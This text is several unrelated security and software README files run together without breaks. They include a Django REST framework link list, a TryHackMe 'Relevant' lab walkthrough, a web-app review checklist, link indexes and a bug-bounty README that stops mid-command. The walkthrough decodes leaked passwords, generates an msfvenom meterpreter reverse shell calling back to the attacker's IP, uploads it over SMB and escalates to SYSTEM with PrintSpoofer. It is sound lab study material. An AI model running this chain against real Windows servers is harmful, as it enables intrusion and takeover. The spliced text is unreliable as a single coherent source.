disclosure. [build-status-image]: https://secure.travis-ci.org/encode/django-rest-framework.svg?branch=master [travis]: https://travis-ci.org/encode/django-rest-framework?branch=master [coverage-status-image]: https://img.shields.io/codecov/c/github/encode/django-rest-framework/master.svg [codecov]: https://codecov.io/github/encode/django-rest-framework?branch=master [pypi-version]: https://img.shields.io/pypi/v/djangorestframework.svg [pypi]: https://pypi.python.org/pypi/djangorestframework [twitter]: https://twitter.com/_tomchristie [group]: https://groups.google.com/forum/?fromgroups#!forum/django-rest-framework [sandbox]: https://restframework.herokuapp.com/ [funding]: https://fund.django-rest-framework.org/topics/funding/ [sponsors]: https://fund.django-rest-framework.org/topics/funding/#our-sponsors [rover-img]: https://raw.githubusercontent.com/encode/django-rest-framework/master/docs/img/premium/rover-readme.png [sentry-img]: https://raw.githubusercontent.com/encode/django-rest-framework/master/docs/img/premium/sentry-readme.png [stream-img]: https://raw.githubusercontent.com/encode/django-rest-framework/master/docs/img/premium/stream-readme.png [machinalis-img]: https://raw.githubusercontent.com/encode/django-rest-framework/master/docs/img/premium/machinalis-readme.png [rollbar-img]: https://raw.githubusercontent.com/encode/django-rest-framework/master/docs/img/premium/rollbar-readme.png [rover-url]: http://jobs.rover.com/ [sentry-url]: https://getsentry.com/welcome/ [stream-url]: https://getstream.io/try-the-api/?utm_source=drf&utm_medium=banner&utm_campaign=drf [machinalis-url]: https://hello.machinalis.co.uk/ [rollbar-url]: https://rollbar.com/ [oauth1-section]: http://www.django-rest-framework.org/api-guide/authentication/#django-rest-framework-oauth [oauth2-section]: http://www.django-rest-framework.org/api-guide/authentication/#django-oauth-toolkit [serializer-section]: http://www.django-rest-framework.org/api-guide/serializers/#serializers [modelserializer-section]: http://www.django-rest-framework.org/api-guide/serializers/#modelserializer [functionview-section]: http://www.django-rest-framework.org/api-guide/views/#function-based-views [generic-views]: http://www.django-rest-framework.org/api-guide/generic-views/ [viewsets]: http://www.django-rest-framework.org/api-guide/viewsets/ [routers]: http://www.django-rest-framework.org/api-guide/routers/ [serializers]: http://www.django-rest-framework.org/api-guide/serializers/ [authentication]: http://www.django-rest-framework.org/api-guide/authentication/ [image]: http://www.django-rest-framework.org/img/quickstart.png [docs]: http://www.django-rest-framework.org/ [security-mail]: mailto:[email protected]
# Relevant Penetration Testing Challenge [Relevant](https://tryhackme.com/room/relevant) ## Topic's - Network Enumeration - SMB Enumeration - Cryptography - Base64 - Security Misconfiguration - msfvenom (Aspx) - Abusing Impersonation Privileges (PrintSpoofer) ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Task 1 Pre-Engagement Briefing You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. **Scope of Work** The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation: - User.txt - Root.txt Additionally, the client has provided the following scope allowances: - Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first - Locate and note all vulnerabilities found - Submit the flags discovered to the dashboard - Only the IP address assigned to your machine is in scope - Find and report ALL vulnerabilities (yes, there is more than one path to root) (Roleplay off) I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field. Note - Nothing in this room requires Metasploit Machine may take up to 5 minutes for all services to start. **Please do not stream this room for the first 7 days of it's release (August 21, 2020).** ``` kali@kali:~/CTFs/tryhackme/Relevant$ sudo nmap -p- -sS -sC -sV -O 10.10.9.11 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 21:31 CEST Nmap scan report for 10.10.9.11 Host is up (0.063s latency). Not shown: 65527 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: RELEVANT | NetBIOS_Domain_Name: RELEVANT | NetBIOS_Computer_Name: RELEVANT | DNS_Domain_Name: Relevant | DNS_Computer_Name: Relevant | Product_Version: 10.0.14393 |_ System_Time: 2020-10-14T19:34:20+00:00 | ssl-cert: Subject: commonName=Relevant | Not valid before: 2020-07-24T23:16:08 |_Not valid after: 2021-01-23T23:16:08 |_ssl-date: 2020-10-14T19:35:00+00:00; 0s from scanner time. 49663/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-10-14T12:34:20-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-10-14T19:34:24 |_ start_date: 2020-10-14T19:29:46 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 211.45 seconds ``` ``` kali@kali:~/CTFs/tryhackme/Relevant$ smbclient -L //10.10.9.11 Enter WORKGROUP\kali's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC nt4wrksv Disk SMB1 disabled -- no workgroup available kali@kali:~/CTFs/tryhackme/Relevant$ smbclient //10.10.9.11/nt4wrksv Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jul 25 23:46:04 2020 .. D 0 Sat Jul 25 23:46:04 2020 passwords.txt A 98 Sat Jul 25 17:15:33 2020 7735807 blocks of size 4096. 4950835 blocks available smb: \> get passwords.txt getting file \passwords.txt of size 98 as passwords.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec) smb: \> exit kali@kali:~/CTFs/tryhackme/Relevant$ cat passwords.txt [User Passwords - Encoded] Qm9iIC0gIVBAJCRXMHJEITEyMw== QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk kali@kali:~/CTFs/tryhackme/Relevant$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d Bob - !P@$$W0rD!123 kali@kali:~/CTFs/tryhackme/Relevant$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d Bill - Juw4nnaM4n420696969!$$$ ``` `Bob:!P@$$W0rD!123` `Bill:Juw4nnaM4n420696969!$$$` ``` kali@kali:~/CTFs/tryhackme/Relevant$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.106.222 lport=4444 -f aspx -o shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 201283 bytes Final size of aspx file: 1015556 bytes Saved as: shell.aspx kali@kali:~/CTFs/tryhackme/Relevant$ smbclient //msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.8.50.72 lport=4444 -f aspx -o shell.aspx^C kali@kali:~/CTFs/tryhackme/Relevant$ smbclient //10.10.9.11/nt4wrksv Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> put shell.aspx putting file shell.aspx as \shell.aspx (798.5 kb/s) (average 798.5 kb/s) smb: \> ls . D 0 Wed Oct 14 21:42:49 2020 .. D 0 Wed Oct 14 21:42:49 2020 passwords.txt A 98 Sat Jul 25 17:15:33 2020 shell.aspx A 1015556 Wed Oct 14 21:42:50 2020 7735807 blocks of size 4096. 4935058 blocks available smb: \> ``` ``` kali@kali:~/CTFs/tryhackme/Relevant$ msfconsole -q [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp payload => windows/x64/meterpreter_reverse_tcp msf5 exploit(multi/handler) > set lhost 10.8.106.222 lhost => 10.8.106.222 msf5 exploit(multi/handler) > set lport 4444 lport => 4444 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.8.106.222:4444 [*] Meterpreter session 1 opened (10.8.106.222:4444 -> 10.10.9.11:49873) at 2020-10-14 21:52:05 +0200 ``` ``` meterpreter > getuid Server username: IIS APPPOOL\DefaultAppPool meterpreter > cd c:/users meterpreter > dir Listing: c:\users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2020-07-25 17:05:52 +0200 .NET v4.5 40777/rwxrwxrwx 0 dir 2020-07-25 17:05:49 +0200 .NET v4.5 Classic 40777/rwxrwxrwx 0 dir 2020-07-25 16:57:31 +0200 Administrator 40777/rwxrwxrwx 0 dir 2016-07-16 15:34:35 +0200 All Users 40777/rwxrwxrwx 0 dir 2020-07-25 17:21:26 +0200 Bob 40555/r-xr-xr-x 0 dir 2016-07-16 08:04:24 +0200 Default 40777/rwxrwxrwx 0 dir 2016-07-16 15:34:35 +0200 Default User 40555/r-xr-xr-x 0 dir 2016-07-16 15:23:21 +0200 Public 100666/rw-rw-rw- 174 fil 2016-07-16 15:23:24 +0200 desktop.ini meterpreter > cd c:/users/Bob/Desktop meterpreter > dir Listing: c:\users\Bob\Desktop ============================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 35 fil 2020-07-25 17:23:52 +0200 user.txt meterpreter > cat user.txt THM{fdk4ka34vk346ksxfr21tg789ktf45} ``` [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) [PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) ``` kali@kali:~/CTFs/tryhackme/Relevant$ smbclient //10.10.9.11/nt4wrksv Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> pwd Current directory is \\10.10.9.11\nt4wrksv\ smb: \> ls . D 0 Wed Oct 14 21:42:49 2020 .. D 0 Wed Oct 14 21:42:49 2020 passwords.txt A 98 Sat Jul 25 17:15:33 2020 shell.aspx A 1015556 Wed Oct 14 21:42:50 2020 7735807 blocks of size 4096. 5135045 blocks available smb: \> put PrintSpoofer.exe putting file PrintSpoofer.exe as \PrintSpoofer.exe (22.4 kb/s) (average 22.4 kb/s) smb: \> ls . D 0 Wed Oct 14 22:08:03 2020 .. D 0 Wed Oct 14 22:08:03 2020 passwords.txt A 98 Sat Jul 25 17:15:33 2020 PrintSpoofer.exe A 27136 Wed Oct 14 22:08:04 2020 shell.aspx A 1015556 Wed Oct 14 21:42:50 2020 7735807 blocks of size 4096. 5135038 blocks available smb: \> exit ``` ``` c:\users\Bob\Desktop>cd C:\ cd C:\ C:\>cd \inetpub\wwwroot\nt4wrksv cd \inetpub\wwwroot\nt4wrksv C:\inetpub\wwwroot\nt4wrksv>ls ls 'ls' is not recognized as an internal or external command, operable program or batch file. C:\inetpub\wwwroot\nt4wrksv>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of C:\inetpub\wwwroot\nt4wrksv 10/14/2020 01:08 PM <DIR> . 10/14/2020 01:08 PM <DIR> .. 07/25/2020 08:15 AM 98 passwords.txt 10/14/2020 01:08 PM 27,136 PrintSpoofer.exe 10/14/2020 12:42 PM 1,015,556 shell.aspx 3 File(s) 1,042,790 bytes 2 Dir(s) 21,033,115,648 bytes free C:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\system PS C:\Windows\system32> cd \users\administrator\desktop cd \users\administrator\desktop PS C:\users\administrator\desktop> dir dir Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/25/2020 8:25 AM 35 root.txt PS C:\users\administrator\desktop> type root.txt type root.txt THM{1fk5kf469devly1gl320zafgl345pv} ``` 1. User Flag `THM{fdk4ka34vk346ksxfr21tg789ktf45}` 2. Root Flag `THM{1fk5kf469devly1gl320zafgl345pv}`
# AWAE-Prep AWAE course preparation to OSWE certification with hackthebox machines # NetSecFocus prep list https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=665299979 # Upgraded script for 'Fighter HTB' [Here](https://gitlab.com/s0j0hn/awae-prep/snippets/1967151) # WIP: Methodology for web application review - TODO: Add more content and rewrite the others ## Visible Content + Browser Proxy (burpsuite, zap, or other)? + Can you keep track of form/data submitted? ViewState? + Where does authentication applies for ? Can you easily 'spider' throughout the website? ## Discover Hidden Content + What if we try to access the content we should not have access to? Any obvious content (admin, config, install ...)? + Can you identify the hidden server-side? Perform, if needed, the enumeration of the web application (Nikto or others), it helps. ## Test for Debug Parameters + Can you trigger the hidden debug parameters of certain function/endpoints? + Did you spot any anomalies within responses that may indicate that the added parameter hs had an effect on the website? ## Identify Functionality + What's the session management mechanism? Is there any access control or recovery features (account or password/token)? + What can you tell about customized data transmission or encoding nonstandard mechanisms? Anything seems odd? + Can identify any out-of-band channels via which user-controllable or other third-party data is being introduced into the application? Rendering content from another protocol? + Can you tell which technologies are used on client-side or server-side, such as forms, scripts, cookies, Java applets, etc. ## Map the Attack Surface + Can you see which feature/endpoint is going to work with another part of the website, like the database? + If there is a lot of content/features, how are you going to proceed? Can you prioritize your searches by potential vulnerabilities? ## Test Client-Side Controls + Can you see any obfuscated content? How can you exploit it to your advantage? Have you retrieved any sensible/config information? + Can you modify the values passed to the application functionality like deserialization strings or forms? + Can you review the deserialized content for any angle of exploitation? What about common deserialization attacks? + Can you test each affected input field by submitting data that would ordinarily be blocked by the client-side controls to verify whatever these are replicated on the server-side? + Can you see any disabled elements in the HTML source? ## Test the Authentication Mechanism + What are the authentications entry points being used by the website (including login, registration, account recovery, and so on)? + Can you determine whether any other means exists of obtaining several user accounts? + Can you find and review the password policy used by the website? Is there any vector of exploitation (weak passwords, crypto ...)? + How are usernames constructed? Are they emails or maybe trigrams? Are they unique? Where is the username used? + At each location, using an account that you control, can you manually send several requests containing the valid username but invalid credentials? How does the application react to this behavior? + How does the account recovery function work? Can you reproduce the complete walk-through of the recovery process using an account you control? + Can you determine whether users can set or select their own challenge questions during registration? + If the main login function or its supporting logic contains a Remember Me function, can you activate this and review its effects? If this function allows the user to log in on subsequent occasions without entering any credentials, can you review it closely for any vulnerabilities? + Can you modify the contents of your cookie in suit-able ways in an attempt to masquerade as other users of the application? + If the application registers both accounts, probe further to determine its behavior when a collision of username and password occurs, attempt to change the password of one of the accounts to match that of the other. Also, attempt to register two accounts with identical usernames and passwords.
# VAULT 101 --- > Android Reverse Engineering > 500 points > 15 solves --- Short Writeup : [Medium](https://medium.com/bugbountywriteup/vault-101-samsung-ctf-android-reverse-engineering-challenge-write-up-d5a2b16a9212) Detailed Writeup : [Personal Blog](https://saket-upadhyay.github.io/2020/08/18/sstf-vault-wtireup.html)
# SecurityTips This repo contains full collection of HackerScrolls tips. Socials: <a href="https://twitter.com/hackerscrolls" target="_blank"> <img src="https://raw.githubusercontent.com/hackerscrolls/SecurityTips/master/.images/twitter.png" align="center" width="25" /> </a> <a href="https://t.me/hackerscrolls" target="_blank"> <img src="https://raw.githubusercontent.com/hackerscrolls/SecurityTips/master/.images/telegram.png" align="center" width="25" /> </a> - **[Burp Suite](https://github.com/hackerscrolls/SecurityTips/tree/master/BurpSuite)** - [Bruteforce Basic Auth](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Basic_Auth_BruteForce.png) - [Effective Search](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Effective_Search_In_Burp.png) - [Intruder Server Response time](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Intruder_Server_Response_Time.png) - [Match Replace: Hidden Elements](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Proxy_Show_Hidden_Match_Replace_1.png) - [Match Replace: Hidden Interface](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Proxy_Show_Hidden_Match_Replace_2.png) - [Match Replace: IDORs](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Proxy_Show_Hidden_Match_Replace_3.png) - [Show All HTML Comments](https://github.com/hackerscrolls/SecurityTips/blob/master/BurpSuite/Target_Show_All_HTML_Comments.png) - **[Mindmaps](https://github.com/hackerscrolls/SecurityTips/tree/master/MindMaps)** - [Testing 2FA](https://github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/2FA_bugs.png) - [Testing OAuth](https://github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/OAuth_bugs.png) - [Testing SSRF](https://github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/SSRF.png) - [Testing file upload](https://github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/File_upload_bugs.png) - [iOS Security](https://github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/iOS_Security.jpg) - [iOS for Bug Bounty](https://github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/iOS_for_BugBounty.jpg) - **[Misc](https://github.com/hackerscrolls/SecurityTips/tree/master/Misc)** - [Multiple Firefox Accounts for Testing Roles](https://github.com/hackerscrolls/SecurityTips/tree/master/Misc/Multiple_Firefox_Accounts.jpg) - [6 One Line Simple Servers](https://github.com/hackerscrolls/SecurityTips/tree/master/Misc/One_Line_Simple_Servers.jpg) - [Remove Noisy Firefox Telemetry](https://github.com/hackerscrolls/SecurityTips/tree/master/Misc/Remove_Firefox_Telemetry.jpg) - **[Mobile](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile)** - [4 Ways to MiTM Android App](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/Mitm/MiTM_Android_App_4_Ways.png) - [MiTM Android via DNS](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/Mitm/MiTM_Android_App_DNS.png) - [MiTM Android via IPTABLES](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/Mitm/MiTM_Android_App_IPTABLES.png) - [SSL Unpinning Trick](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/Mitm/SSL_Unpinning_Case.png) - [Suitable Android Versions](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/Android_Versions.png) - [4 Ways to Extract APK](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/How_To_Extract_APK.png) - [Exported Activities Tricks](https://github.com/hackerscrolls/SecurityTips/tree/master/Mobile/Сheck_Exported_Activities.jpg) - **[Passwords](https://github.com/hackerscrolls/SecurityTips/tree/master/Passwords)** - [Password Spraying](https://github.com/hackerscrolls/SecurityTips/tree/master/Passwords/Password_Spraying.jpg) - [Password Dictionaries - Weakpass](https://github.com/hackerscrolls/SecurityTips/tree/master/Passwords/Passwords_Weakpass.jpg) - **[Red Team and Penetration Testing](https://github.com/hackerscrolls/SecurityTips/tree/master/Pentest.Redteam)** - [Cisco Smart Install](https://github.com/hackerscrolls/SecurityTips/tree/master/Pentest.Redteam/Cisco_Smart_Install.jpg) - [Gateway Finder](https://github.com/hackerscrolls/SecurityTips/tree/master/Pentest.Redteam/Gateway_Finder.jpg) - [Sniffing SSH Passwords with 3Snake](https://github.com/hackerscrolls/SecurityTips/tree/master/Pentest.Redteam/Sniffing_SSH_Passwords_3Snake.jpg) - [Tunneling TCP Over DNS](https://github.com/hackerscrolls/SecurityTips/tree/master/Pentest.Redteam/Tunneling_Over_DNS.jpg) - [SOCKS to the internal server - frp proxy](https://github.com/hackerscrolls/SecurityTips/tree/master/Pentest.Redteam/Socks_to_internal_network_Frp_Proxy.png) - **[Recon](https://github.com/hackerscrolls/SecurityTips/tree/master/Recon)** - [Dirsearch by Temp Extensions](https://github.com/hackerscrolls/SecurityTips/tree/master/Recon/Dirsearch_Like_A_Pro.jpg) - [Find IP Behind Cloud Firewall 1](https://github.com/hackerscrolls/SecurityTips/tree/master/Recon/Find_IP_behind_cloud_Firewall_1.png) - [Find IP Behind Cloud Firewall 2](https://github.com/hackerscrolls/SecurityTips/tree/master/Recon/Find_IP_behind_cloud_Firewall_2.png) - [Expanding Scope with bgp.he.net](https://github.com/hackerscrolls/SecurityTips/tree/master/Recon/Recon_BGP.HE.NET.jpg) - [Waybackurls](https://github.com/hackerscrolls/SecurityTips/tree/master/Recon/WayBackURLs.jpg) - **[Web](https://github.com/hackerscrolls/SecurityTips/tree/master/Web)** - [CORS](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/CORS) - [Bypassing Allowed Domains List](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/CORS/Breaking_CORS_Bypass_Allow_List.jpg) - [Chrome Cache Trick](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/CORS/Breaking_CORS_Chrome_Cache.png) - [null Origin](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/CORS/Breaking_CORS_null_Origin.jpg) - [Common CSRF bypasses](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/CSRF/Common_CSRF_Bypasses.jpg) - [Monitor Changes in JS](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/JavaScript/Monitor_Changes_In_JS_1.jpg) - [Monitor Changes in JS](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/JavaScript/Monitor_Changes_In_JS_2.jpg) - [SameSite](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Samesite) - [Samesite Bypass - Chrome 120 secs Trick](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Samesite/Bypassing_Samesite_120_secs.jpg) - [SameSite Common Info](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Samesite/Samesite_Common_Info.jpg) - [Different SameSite Cookies Behavior in Browsers](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Samesite/Samesite_Different_Cookies_Behavior.jpg) - [Testing SQL Syntax in SQLFiddle](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/JavaScript/Samesite) - [WebSocket Hijacking](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/WebSockets/Websocket_Hijacking.jpg) - [XSS](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/XSS) - [Encoding JS in HTML Tags](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/XSS/Encodings_JS_XSS.jpg) - [Mutation points in HTML Tags](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/XSS/Mutation_Points_HTML_XSS.jpg) - [Upgrading Self XSS](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/XSS/Upgrading_Self_XSS.jpg) - [Bypassing 403 Restriction](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Bypass_403_Top_4.jpg) - [Insecure Deserialization](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Insecure_Deserialization.jpg) - [SSRF via PDF/Image Rendering](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Rendrer_PDF_Generators_SSRF.jpg) - [Mass Assignment and Autobinding](https://github.com/hackerscrolls/SecurityTips/tree/master/Web/Mass_Assignment.png)
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Airixss](https://github.com/ferreiraklet/airixss) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Freq](https://github.com/takshal/freq) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Goop](https://github.com/deletescape/goop) - [GetJS](https://github.com/003random/getJS) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [Knoxss](https://knoxss.me/) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [log4j-scan](https://github.com/fullhunt/log4j-scan) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Notify](https://github.com/projectdiscovery/notify) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [Unfurl](https://github.com/tomnomnom/unfurl) - [Urldedupe](https://github.com/ameenmaali/urldedupe) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [X8](https://github.com/Sh1Yo/x8) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' 